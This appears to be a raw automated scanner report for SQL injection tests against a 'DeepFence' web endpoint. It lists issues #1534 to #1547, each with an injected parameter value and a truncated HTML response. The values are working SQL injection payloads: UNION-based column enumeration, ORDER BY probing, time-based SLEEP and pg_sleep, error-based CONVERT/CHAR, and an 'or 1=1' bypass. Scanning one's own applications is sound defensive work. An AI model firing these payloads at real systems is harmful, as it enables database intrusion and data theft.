href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1534Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1535\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1536\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1-true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1537\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1538\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1539\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1540\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1541\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1542\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1543\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ``\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1544\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1545\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1546\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1547\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 